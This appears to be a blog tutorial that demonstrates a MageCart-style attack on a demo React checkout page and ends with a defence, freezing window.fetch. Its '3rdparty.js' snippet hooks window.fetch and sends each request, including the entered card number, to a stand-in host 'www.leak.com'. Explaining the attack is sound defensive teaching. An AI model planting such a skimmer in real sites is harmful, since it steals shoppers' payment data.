MageCart Attack

In this post we will provide an example to illustrate the MageCart attacks.

The MageCart group had deployed a malicious javascript code in a e-commerce website, that had copied confidential customer information, into MageCart group server. 

The deployment was done in a clever way. The e-commerce site has many 3rd-parties tools that it uses, and some of these are included directly from the 3rd-party site. The MageCart group had attacked one of the 3rd-parties, and injected their own javascript code into the 3rd-party code. By doing this, the MageCart javascript code was actually injected into the e-commerce website.

Let's check how is this done.

To simulate the e-commerce website, we will start from an empty site. We will build the site using a react app:

npx create-react-app demo
cd demo
npm start

Next we create a simple page with a /buy/card=ID to simulate an item purchase transaction. To do so, we replace the App.js with the following:

import React, {useState} from 'react';
import './App.css';

function App() {
    const [card, setCard] = useState('1111111');
    return (
        <div className="App">
            <div>
                Enter your credit card number:
            </div>
            <input
                type="text"
                value={card}
                onChange={e => setCard(e.target.value)}
            />
            <div
                onClick={() => buy()}
            >
                Buy Me!
            </div>
        </div>
    );

    function buy() {
        fetch(`/api/buy?card=${card}`).then(() => {
            alert("you've got it")
        })
    }

}

export default App;

Clicking on the "Buy Me!" triggers the /api/buy?card=CARD_ID API call.

Now let's add a stub to simulate a 3rd-party include:

import './3rdparty';
import React, {useState} from 'react';
import './App.css';

And leak out the CARD ID to another URL from the 3rdparty.js include:

const origFetch = window.fetch

window.fetch = async function (url, args) {
    origFetch.apply(this, [
        "www.leak.com", {
            method: 'POST',
            body: JSON.stringify({
                url,
                args,
            })
        }
    ])

    return origFetch.apply(this, [url, args])
}

Final Notes

In this post we have reviewed an example of the MageCart attack.

A possible protection from such an attack is to freeze the window.fetch function, as specified in this post. This requires your javascript code to be executed before the included 3rdparty.js, but is quite easy to achieve.